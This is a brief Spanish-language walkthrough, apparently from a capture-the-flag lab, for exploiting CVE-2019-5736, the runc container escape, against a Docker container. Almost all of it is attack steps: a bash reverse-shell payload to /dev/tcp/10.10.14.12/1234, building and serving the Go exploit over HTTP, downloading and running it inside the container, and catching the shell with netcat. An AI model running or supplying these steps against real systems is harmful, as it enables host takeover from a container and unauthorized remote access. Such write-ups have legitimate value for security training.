
Exploit basado en Go para CVE-2019-5736 (escape de contenedor Runc) con un payload de reverse shell personalizable, diseñado para pruebas de penetración y operaciones de equipo rojo contra contenedores Docker vulnerables.
🖥️ -h3x0v3rl0rd- #️⃣ CVE-2019-5736
La máquina es vulnerable a CVE-2019-5736, sigue los pasos del exploit de Runc (CVE-2019-5736). Descarga el archivo main.go, cambia el payload en el archivo a:
var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.12/1234 0>&1"
Después de eso, ejecuta:
go build main.go
Aloja un servidor http:
python3 -m http.server

Luego abre 3 terminales como se muestra a continuación:

Terminal 1
sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash
wget http://10.10.14.12/main
chmod +x main
./main
Terminal 2
sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh
Terminal 3
nc -nlvp 1234
Una vez que ejecutes ./main en la primera terminal ssh, ejecuta inmediatamente el segundo comando en la segunda terminal ssh, luego obtendrás la reverse shell de netcat en la terminal 3

